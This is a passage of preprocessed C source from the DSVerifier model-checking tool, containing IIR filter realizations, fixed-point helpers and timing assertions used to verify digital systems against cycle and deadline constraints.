# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"sv >= nv"
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 394, __extension__ __PRETTY_FUNCTION__); }))
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
snr = sv / nv;
return snr;
} else {
return 9999.9f;
}
}
float snrPoint(float s[], float n[], int blksz) {
int i;
double ratio = 0, power = 0;
for (i = 0; i < blksz; i++) {
if(n[i] == 0) continue;
ratio = s[i] / n[i];
if(ratio > 150.0f || ratio < -150.0f) continue;
power = ratio * ratio;
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
power >= 1.0f
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
power >= 1.0f
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"power >= 1.0f"
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 412, __extension__ __PRETTY_FUNCTION__); }))
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
}
return 9999.9f;
}
unsigned long next = 1;
int rand(void)
{
next = next*1103515245 + 12345;
return (unsigned int)(next/65536) % 32768;
}
void srand(unsigned int seed)
{
next = seed;
}
float iirIIOutTime(float w[], float x, float a[], float b[], int Na, int Nb) {
int timer1 = 0;
float *a_ptr, *b_ptr, *w_ptr;
float sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
timer1 += 71;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
timer1 += 54;
}
w[0] += x;
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
timer1 += 46;
}
timer1 += 38;
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"(double)timer1*CYCLE <= (double)DEADLINE"
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 450, __extension__ __PRETTY_FUNCTION__); }))
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
return sum;
}
float iirIItOutTime(float w[], float x, float a[], float b[], int Na, int Nb) {
int timer1 = 0;
float *a_ptr, *b_ptr;
float yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
timer1 += 105;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
timer1 += 41;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
timer1 += 38;
}
timer1 += 54;
}
timer1 += 7;
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"(double)timer1*CYCLE <= (double)DEADLINE"
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 477, __extension__ __PRETTY_FUNCTION__); }))
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
return yout;
}
double iirIItOutTime_double(double w[], double x, double a[], double b[], int Na, int Nb) {
int timer1 = 0;
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
timer1 += 105;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
timer1 += 41;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
timer1 += 38;
}
timer1 += 54;
}
timer1 += 7;
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"(double)timer1*CYCLE <= (double)DEADLINE"
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 504, __extension__ __PRETTY_FUNCTION__); }))
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
return yout;
}
void iirOutBoth(float yf[], float xf[], float af[], float bf[], float *sumf_ref,
fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t *sum_ref, int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr;
fxp_t sum = 0;
float sumf = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
af_ptr = &af[1];
yf_ptr = &yf[Na - 1];
bf_ptr = &bf[0];
xf_ptr = &xf[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum = fxp_add(sum, fxp_mult(*b_ptr++, *x_ptr--));
sumf += *bf_ptr++ * *xf_ptr--;
}
for (j = 1; j < Na; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr++, *y_ptr--));
sumf -= *af_ptr++ * *yf_ptr--;
}
*sum_ref = sum;
*sumf_ref = sumf;
}
fxp_t iirOutFixedL(fxp_t y[], fxp_t x[], fxp_t xin, fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
int i, j;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
}
x[Nb - 1] = xin;
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
for (j = 1; j < Na - 1; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[j] = y[j+1];
}
if(Na>1) sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[Na - 1] = sum;
return sum;
}
float iirOutFloatL(float y[], float x[], float xin, float a[], float b[], int Na, int Nb) {
float *a_ptr, *y_ptr, *b_ptr, *x_ptr;
float sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
int i, j;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum += *b_ptr-- * *x_ptr++;
}
x[Nb - 1] = xin;
sum += *b_ptr-- * *x_ptr++;
for (j = 1; j < Na - 1; j++) {
sum -= *a_ptr-- * *y_ptr++;
y[j] = y[j+1];
}
if(Na>1) sum -= *a_ptr-- * *y_ptr++;
y[Na - 1] = sum;
return sum;
}
float iirOutBothL(float yf[], float xf[], float af[], float bf[], float xfin,
fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t xin, int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr;
float sumf = 0;
af_ptr = &af[Na - 1];
yf_ptr = &yf[1];
bf_ptr = &bf[Nb - 1];
xf_ptr = &xf[0];
int i, j;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
xf[i] = xf[i+1];
sumf += *bf_ptr-- * *xf_ptr++;
}
x[Nb - 1] = xin;
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
xf[Nb - 1] = xfin;
sumf += *bf_ptr-- * *xf_ptr++;
for (j = 1; j < Na - 1; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[j] = y[j+1];
sumf -= *af_ptr-- * *yf_ptr++;
yf[j] = yf[j+1];
}
if(Na>1) sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[Na - 1] = sum;
if(Na>1) sumf -= *af_ptr-- * *yf_ptr++;
yf[Na - 1] = sumf;
return fxp_to_float(sum) - sumf;
}
float iirOutBothL2(float yf[], float xf[], float af[], float bf[], float xfin,
fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t xin, int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr;
float sumf = 0;
af_ptr = &af[Na - 1];
yf_ptr = &yf[1];
bf_ptr = &bf[Nb - 1];
xf_ptr = &xf[0];
int i=0, j=1;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum = fxp_add(sum, fxp_mult(b[Nb - 1 - i], x[i]));
xf[i] = xf[i+1];
sumf += bf[Nb - 1 - i] * xf[i];
}
x[Nb - 1] = xin;
sum = fxp_add(sum, fxp_mult(b[Nb - 1 - i], x[i]));
xf[Nb - 1] = xfin;
sumf += bf[Nb - 1 - i] * xf[i];
for (j = 1; j < Na - 1; j++) {
sum = fxp_sub(sum, fxp_mult(a[Na - j], y[j]));
y[j] = y[j+1];
sumf -= af[Na - j] * yf[j];
yf[j] = yf[j+1];
}
if(Na>1) sum = fxp_sub(sum, fxp_mult(a[Na - j], y[j]));
y[Na - 1] = sum;
if(Na>1) sumf -= af[Na - j] * yf[j];
yf[Na - 1] = sumf;
return fxp_to_float(sum) - sumf;
}
# 25 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
extern digital_system ds;
extern hardware hw;
extern int generic_timer;
fxp_t fxp_direct_form_1(fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum = fxp_add(sum, fxp_mult(*b_ptr++, *x_ptr--));
}
for (j = 1; j < Na; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr++, *y_ptr--));
}
fxp_verify_overflow_node(sum, "An Overflow Occurred in the node a0");
sum = fxp_div(sum,a[0]);
return fxp_quantize(sum);
}
fxp_t fxp_direct_form_2(fxp_t w[], fxp_t x, fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *b_ptr, *w_ptr;
fxp_t sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
for (j = 1; j < Na; j++) {
w[0] = fxp_sub(w[0], fxp_mult(*a_ptr++, *w_ptr++));
}
w[0] = fxp_add(w[0], x);
w[0] = fxp_div(w[0], a[0]);
fxp_verify_overflow_node(w[0], "An Overflow Occurred in the node b0");
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum = fxp_add(sum, fxp_mult(*b_ptr++, *w_ptr++));
}
return fxp_quantize(sum);
}
fxp_t fxp_transposed_direct_form_2(fxp_t w[], fxp_t x, fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *b_ptr;
fxp_t yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = fxp_add(fxp_mult(*b_ptr++, x), w[0]);
yout = fxp_div(yout, a[0]);
int j;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] = fxp_sub(w[j], fxp_mult(*a_ptr++, yout));
}
if (j < Nb - 1) {
w[j] = fxp_add(w[j], fxp_mult(*b_ptr++, x));
}
}
fxp_verify_overflow_node(w[j], "An Overflow Occurred in the node a0");
return fxp_quantize(yout);
}
double double_direct_form_1(double y[], double x[], double a[], double b[], int Na, int Nb) {
double *a_ptr, *y_ptr, *b_ptr, *x_ptr;
double sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum += *b_ptr++ * *x_ptr--;
}
for (j = 1; j < Na; j++) {
sum -= *a_ptr++ * *y_ptr--;
}
sum = (sum / a[0]);
return sum;
}
double double_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
double *a_ptr, *b_ptr, *w_ptr;
double sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
}
w[0] += x;
w[0] = w[0] / a[0];
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
}
return sum;
}
double double_transposed_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
yout = yout / a[0];
int j;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
}
}
return yout;
}
float float_direct_form_1(float y[], float x[], float a[], float b[], int Na, int Nb) {
float *a_ptr, *y_ptr, *b_ptr, *x_ptr;
float sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum += *b_ptr++ * *x_ptr--;
}
for (j = 1; j < Na; j++) {
sum -= *a_ptr++ * *y_ptr--;
}
sum = (sum / a[0]);
return sum;
}
float float_direct_form_2(float w[], float x, float a[], float b[], int Na, int Nb) {
float *a_ptr, *b_ptr, *w_ptr;
float sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
}
w[0] += x;
w[0] = w[0] / a[0];
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
}
return sum;
}
float float_transposed_direct_form_2(float w[], float x, float a[], float b[], int Na, int Nb) {
float *a_ptr, *b_ptr;
float yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
yout = yout / a[0];
int j;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
}
}
return yout;
}
double double_direct_form_1_MSP430(double y[], double x[], double a[], double b[], int Na, int Nb){
int timer1 = 0;
double *a_ptr, *y_ptr, *b_ptr, *x_ptr;
double sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na-1];
b_ptr = &b[0];
x_ptr = &x[Nb-1];
int i, j;
timer1 += 91;
for (i = 0; i < Nb; i++){
sum += *b_ptr++ * *x_ptr--;
timer1 += 47;
}
for (j = 1; j < Na; j++){
sum -= *a_ptr++ * *y_ptr--;
timer1 += 57;
}
timer1 += 3;
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
((void) sizeof ((
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ; else __assert_fail (
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
"(double) timer1 * hw.cycle <= ds.sample_time"
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 235, __extension__ __PRETTY_FUNCTION__); }))
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
;
return sum;
}
double double_direct_form_2_MSP430(double w[], double x, double a[], double b[], int Na, int Nb) {
int timer1 = 0;
double *a_ptr, *b_ptr, *w_ptr;
double sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
timer1 += 71;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
timer1 += 54;
}
w[0] += x;
w[0] = w[0] / a[0];
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
timer1 += 46;
}
timer1 += 38;
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
((void) sizeof ((
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ; else __assert_fail (
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
"(double) timer1 * hw.cycle <= ds.sample_time"
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 262, __extension__ __PRETTY_FUNCTION__); }))
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
;
return sum;
}
double double_transposed_direct_form_2_MSP430(double w[], double x, double a[], double b[], int Na, int Nb) {
int timer1 = 0;
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
timer1 += 105;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
timer1 += 41;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
timer1 += 38;
}
timer1 += 54;
}
timer1 += 7;
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
((void) sizeof ((
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ; else __assert_fail (
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
"(double) timer1 * hw.cycle <= ds.sample_time"
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 291, __extension__ __PRETTY_FUNCTION__); }))
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
;
return yout;
}
double generic_timing_double_direct_form_1(double y[], double x[], double a[], double b[], int Na, int Nb){
generic_timer += ((6 * hw.assembly.push) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (12 * hw.assembly.std));
double *a_ptr, *y_ptr, *b_ptr, *x_ptr;
double sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na-1];
b_ptr = &b[0];
x_ptr = &x[Nb-1];
generic_timer += ((12 * hw.assembly.std) + (12 * hw.assembly.ldd) + (2 * hw.assembly.subi) + (2 * hw.assembly.sbci) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (1 * hw.assembly.adiw));
int i, j;
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (i = 0; i < Nb; i++){
generic_timer += ((20 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.sbc) + (10 * hw.assembly.std) + (2 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp));
sum += *b_ptr++ * *x_ptr--;
}
generic_timer += ((2 * hw.assembly.ldi) + (2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (j = 1; j < Na; j++){
generic_timer += ((22 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.subi) + (8 * hw.assembly.std) + (1 * hw.assembly.sbci) + (2 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (1 * hw.assembly.sbc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp));
sum -= *a_ptr++ * *y_ptr--;
}
generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (6 * hw.assembly.pop) + (1 * hw.assembly.ret));
return sum;
}
double generic_timing_double_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
generic_timer += ((8 * hw.assembly.push) + (14 * hw.assembly.std) + (3 * hw.assembly.out) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli));
double *a_ptr, *b_ptr, *w_ptr;
double sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
generic_timer += ((10 * hw.assembly.std) + (6 * hw.assembly.ldd) + (2 * hw.assembly.adiw));
generic_timer += ((2 * hw.assembly.ldi) + (2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
generic_timer += ((23 * hw.assembly.ldd) + (32 * hw.assembly.mov) + (9 * hw.assembly.std) + (2 * hw.assembly.subi) + (3 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (2 * hw.assembly.sbci) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brge));
}
w[0] += x;
w_ptr = &w[0];
generic_timer += ((13 * hw.assembly.ldd) + (12 * hw.assembly.mov) + (5 * hw.assembly.std) + (1 * hw.assembly.st) + (1 * hw.assembly.ld) + (1 * hw.assembly.rcall));
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
generic_timer += ((20 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (10 * hw.assembly.std) + (2 * hw.assembly.rcall) + (2 * hw.assembly.ld) + (2 * hw.assembly.subi) + (2 * hw.assembly.sbci) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp));
}
generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (8 * hw.assembly.pop) + (1 * hw.assembly.ret));
return sum;
}
